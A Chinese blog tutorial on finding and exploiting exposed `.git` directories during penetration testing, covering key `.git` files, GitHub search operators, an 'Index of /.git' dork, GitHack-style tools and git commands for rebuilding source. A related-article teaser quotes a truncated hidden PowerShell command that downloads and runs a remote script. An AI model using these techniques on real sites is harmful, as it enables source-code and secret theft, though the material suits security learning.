渗透测试之git信息收集 (git介绍+github使用技巧)

最新推荐文章于 2025-02-20 23:47:12 发布
最新推荐文章于 2025-02-20 23:47:12 发布
阅读量1.4k 收藏 4
点赞数 2
分类专栏: 渗透测试 文章标签: git github
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hmysn/article/details/124833986
版权
本文介绍了git作为去中心化版本控制工具的工作原理及其可能导致的信息泄漏风险。通过目录扫描、robots.txt检查及搜索引擎,可以发现公开的git资源。一旦找到,可以使用各种工具下载并分析git内容,如gitlog、gitreset等命令。同时,文章提到了GitHub上的搜索技巧,帮助用户更高效地查找代码。为了防止信息泄漏,必须谨慎管理git仓库,避免敏感信息暴露。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

什么是git:

git,我们叫做去中心化的版本控制软件。
大型的代码程序软件我们都是很多成员同步合作完成,但是这样就会导致出现代码被覆盖的情况,或者想要找过去版本比较困难的情况。于是就出现了版本控制系统来自动化的帮我们记录。

而去中心化的版本控制系统就是如今最常用,最成熟的代码管理方式,比如github就是去中心化的一个代码控制平台。

为什么git会导致信息泄漏

1、因为git的工作方式是把代码从本地保存后把私有仓库或者隐私文件上传到了github

2、部署项目的时候,不小心把 .git 文件一起打包进 去,放到web网站的目录下

git中有很多有用的内容:

1、.git/logs/HEAD
存储了git的log信息,可以找到历史的commit项

2、.git/index 缓存git add的文件,暂存区

3、.git/refs/stash git stash 把代码存入缓存区

4、.git/refs/heads/master 记录了master的commit的hash。在拿到这个hash之后我们就能把最后一个版本的所有代码全部还原出来!

5、.git/objects/pack/.pack
这个packs也能让我们获得源码

github中有用的搜索技巧:

kali in:file 搜索文件中包含kali的代码

kali in:path 搜索路径中包含kali的代码

kali in:path,file 搜索路径、文件中包含kali的代码

shodan language:python 搜索关键字shodan,语言为python的代码

filename:config.php language:php 搜索文件名为config.php,且语言为php

kali topics:>=5 标签数量大于等于5的

kali size:<1000 文件小于1KB的 kali

stars:10..50 star大于10小于50的

kali pushed:>2021-08-15 搜索在2021年8月15日之后提交的

kali pushed:2021-07-01..2021-08-01
搜索在此区间

kali created:>=2021-06-01创建时间

kali pushed:<2021-08-01 -language:java
搜索在2020年8月1日前push代码且排除java语言

git信息泄漏利用

1、找到git:
找到肯定是我们进行利用的第一步

a、我们可以通过目录扫描的方式去进行扫描

b、robots.txt
反扒机器人中如果存在git,那么说明存在该文件

c、可以通过搜索引擎去发现 intitle:"Index of /.git"
如果发现,那么就是存在隐藏的git文件可以让我们进行查看

2、把git下载到本地:
已经有很多工具存在来下载git到本地

https://github.com/BugScanTeam/GitHack https://github.com/lijiejie/GitHack https://github.com/wangyihang/githacker https://github.com/WangWen-Albert/ JGitHack

这边说一下如何把文件下载到kali中
用wget+网址 命令来进行下载。
也可以用git clone +url来获取

3、用git的命令获取获取内容
git log 查看历史信息
git reset --hard [log hash] 恢复版本
git diff 比较不同版本的区别

也可以用一些工具来进行分析:https://github.com/gakki429/Git_Extract

【网络安全 | 渗透工具】自动化 .env/.git文件检测
等风来
10-01 2091
接下来,只需打开目标应用程序。如果该应用程序包含任何 .env / .git 目录,将会弹出提示消息
Typora+github代替云笔记(git上传文件至github
health的博客
04-13 9017
前提环境:拥有github/gitee账户,电脑上装有git 建议在Typora中设置图片存储路径为相对路径(图片也上传到github上),这样远程打开笔记时也能显示图片 方法一 1.登录github,创建一个新的仓库(这里创建的仓库名为:Typora) 2.复制仓库的https地址备用 3.本地操作: (1)进入我们需要上传到github上的目录中,右键打开Git Bash Here (2)输入:git clone https://github.com/xxxx/xxxxxx.
信息收集----目录扫描搜集与Git收集信息
qq_44418229的博客
05-03 2487
目录扫描收集信息Git收集信息
Web渗透实战--.git文件泄露的一次渗透darkhole2
最新发布
lza20001103的博客
02-20 440
Web渗透实战--.git文件泄露的一次渗透darkhole2
Git 资料收集
AD_Li的只言片语
08-25 929
1 Git 中文教程http://www.bitsun.com/documents/gittutorcn.htm2 使用 Git 管理源代码http://www.ibm.com/developerworks/cn/linux/l-git/index.html3 Everyday GIT With 20 Commands Or Sohttp://www.kernel.org/pub/software
git资料收集
alittleyatou的博客
01-24 181
解决git clone时报错:The requested URL returned error: 401 Unauthorized while accessing
git 收集
weixin_34126215的博客
02-14 92
2019独角兽企业重金招聘Python工程师标准>>> ...
完全学会GIT+GITHUB+GIT+SERVER的24堂课
03-09
Git是分布式版本控制系统,GITHUB是全球最大的开源代码托管平台,而Git Server则是用于搭建本地或私有Git仓库的服务端程序。这三者构成了开发者进行版本控制和协作开发的核心工具链。下面,我们将深入探讨这些知识点...
git的常用命令及github使用技巧
12-18
Git是一款由Linux创始人Linus Torvalds开发的免费、开源的分布式版本控制系统,因其高效、灵活的特点被全球众多知名公司...了解和熟练掌握Git的常用命令和GitHub使用技巧,对于任何IT从业者来说都是非常重要的技能。
Git02之Git Gui+git/github生成密钥+idea中配置并使用Git
全栈
09-13 1647
1. 创建和删除分支(了解即可) 创建分支命令:git branch 分支名 查看所有分支命令:git branch 切换分支命令:git checkout 分支名 合并分支到master分支上命令: 首先切换到master分支,git checkout master,然后git merge 分支名。即将创建的分支合并到master上。 删除分支命令:git branch -d 分支名 2. Git Gui GIT官方网站为了解决部分用户通过命令行对git工具使用
github上的信息收集
Zlirving_的博客
06-19 1775
在一个交流群上,看到有位老哥在github上找某SRC厂商的信息泄露,俗称“捡垃圾”,报上高危,换算过来赏了xxxx软妹币。有点心动? 所以今天也学习除了google hack以外的关于github上敏感信息的一些搜索语法(主要也是结合google) Github是一个分布式的版本控制系统,目前拥有上百万万开发者用户。当今大规模数据泄露事情一直在发生,从未停止过,但有些人不知道的是很多时候一些敏感信息的泄露其实是我们自己无意中造成的,然而一个小疏忽,往往却造成一系列连锁反应…… Github上敏感信息的泄露
GitHub信息收集
quixon的专栏
09-30 1330
目录桌面版脑图(DesktopNaotu) 桌面版脑图(DesktopNaotu) GitHub链接 桌面版脑图 (百度脑图离线版,思维导图) 跨平台支持 Windows/Linux/Mac OS. (A cross-platform multilingual Mind Map Tool) 操作系统 位数 对应文件 大小 支持情况 MacOS 64位 DesktopNaotu-ma...
gitrob--github信息收集
iteye_16188的博客
01-17 578
原文地址:[url]http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/[/url] 简介 [quote] Gitrob is a command line tool that can help organizations and security professionals find such sen...
GitHub 发布即登顶的渗透教程,做个黑客或安全管理员都随你!
03-22 545
今日的 GitHub 趋势榜榜首,发布仅两天,斩获超 1000 star,就是来自中国老司机的“渗透攻击”经验整理---Micro8。这位大牛研究渗透攻击超十年,这本笔记应该就是传说中的“学霸笔记”吧! 内容非常丰富,全套内容 111 课,理论、demo、项目、实践应有尽有,材料丰...
git敏感信息脚本_黑客入侵系统第一步“信息收集”过程详解
weixin_39983563的博客
11-16 534
记一次黑客大牛的信息收集,不看后悔!!!1.操作系统收集方法操作系统:Windows和Linux大小写敏感 Windows大小写不敏感:如果一个文件存在大小写,名字一致,在Windows上面,它是一个文件,也就是说,不管你大写也好,小写也好,你这个文件就是一个我们的这个Windows搭建的网站,我们把网站的脚本格式asp和php改为大学的PHP或者ASP的话,返回正常就是Windows,返回不正常...
Cobaltstrike4.0系列 -- Beacon HTTP
Web安全工具库
06-23 944
讲过去像是在卖惨,讲未来像是在白日做梦,讲现在又像是旁观者迷,迟迟无语,字字苦酸。。。 ---- 网易云热评 一、新建Listeners,点击save 二、利用powershell命令获取目标主机的Beacon 1、选择Attacks--WebDrive-by--ScriptedwebDelivery 2、选择添加的Listener,点击Launch 3、获取powershell的单行指令 powershell.exe -nop -w hidden -c "IEX ((ne...
利用.Git对服务器进行的一次渗透
whiteinblack
09-18 1875
       此次渗透起源于我写了一个python的聊天脚本,tcp通信可以挂在外网上,但是udp通信接收不到消息,于是我想弄一台内网服务器运行我的服务端脚本转发消息。        使用AWVS对改服务器进行扫描: 发现.git漏洞 在GitHub上下载githack软件https://github.com/lijiejie/GitHack 利用这个软件可以复原工程源码,再分析源码寻...
信息收集搜索引擎收集、目录扫描、Git信息收集
m0_57379855的博客
03-26 2291
信息收集搜索引擎收集、目录扫描、Git信息收集Google Hacking运算符高级语法语法数据库网络空间搜索引擎网络空间搜索引擎网络系统网络设备工业系统OSINT扫描工具标识设备全球实时威胁地图ShodanCLI用法案例其他的网络空间搜索引擎CensysZoomEyeFofa目录扫描部署的网站有一些敏感文件泄露信息泄露原因常见的敏感目录和文件文件扫描思路做法扫描方法?文件扫描的字典工具注意事项防御Git信息收集版本控制系统为什么Git会导致信息泄露Github搜索技巧Git信息泄露利用方式ctfhub技能
推荐两款github敏感信息搜集工具(gsil、gshark)
技术超强的网络安全平台
08-02 2080
所以我们能在第一时间发现自己企业泄露了哪些信息或者获取别人énénén······是很有必要的,这时你就需要下面两个神器啦。# 一级分类,一般使用公司名,用作开启扫描的第一个参数(python gsil.py test)介绍:此工具主要用于GitHub敏感信息泄露的监控,可实现邮件实时告警,缺点不是可视化。直接点击上面的链接会跳到那个文件,这时你就可以愉快的寻找敏感信息啦,哦耶。不建议使用window部署,别问为什么,问就是“错错错,是我的错”一栏,点击开启,绑定QQ安全中心的用户需要输入app中的令牌。
Git+Github+idea
12-27
### 配置 IntelliJ IDEA 使用 Git 为了使 IntelliJ IDEA 能够识别本地安装的 Git,在设置中指定 Git 可执行文件路径至关重要。这可以通过导航至 `File -> Settings -> Version Control -> Git` 并输入 Git 的具体路径来完成,例如 `D:\Program Files\Git\bin\git.exe`[^2]。 一旦完成了上述配置,建议通过点击 "Test" 来验证 Git 是否被正确配置以及其功能是否正常工作[^1]。 对于那些希望简化此流程的人而言,当 Git 安装于默认目录时,较新的 IntelliJ IDEA 版本能够自动检测到它而无需额外的手动干预;然而,如果选择了自定义安装路径,则仍然需要按照前述方法手动设定 Git 的位置[^4]。 ### 创建新仓库并与远程 GitHub 仓库关联 要开始使用 GitHub 进行协作开发,首先应当克隆现有的 GitHub 项目或初始化一个新的本地仓库并将其推送到 GitHub 上: #### 方法一:从现有 GitHub 仓库克隆 利用内置的功能可以直接从菜单栏选择 `VCS -> Get from Version Control...`, 接着提供 GitHub 存储库 URL 即可轻松获取整个项目的副本。 #### 方法二:推送本地项目到 GitHub 如果是首次创建的新项目,可以在 IDE 内部右击工程根目录选择 `Add to VCS -> Git` 初始化本地版本控制系统。随后前往 GitHub 创建空白存储库,并依照提示将本地代码提交上去[^3]。 ### 日常操作指南 - **查看历史记录**:借助左侧边栏中的 “Log” 功能可以方便地浏览不同时间点上的变更情况,帮助理解代码演进的过程[^5]。 - **分支管理**:支持直观地切换、创建和删除分支,从而更好地组织团队成员间的工作流。 ```bash # 添加所有更改后的文件到暂存区 git add . # 提交当前修改 git commit -m "描述性的消息" # 更新远端服务器上的最新改动 git push origin main ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值